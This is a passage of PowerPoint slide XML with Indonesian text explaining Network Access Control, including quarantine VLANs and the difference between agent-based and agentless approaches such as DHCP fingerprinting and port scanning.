              <a:t>memindahkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VLAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karantina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. VLAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diisolasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akibat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Agen vs. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Agen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>NAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>agen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>agen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>agen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>agen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diinstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Agen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkomunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform NAC, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terperinci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> status dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Implementasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> NAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>agen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur-fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>remediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>agen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> NAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menonaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>wajib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebaliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> NAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>agen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengevaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, NAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>agen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sidik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> DHCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sementara</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>agen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendetail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
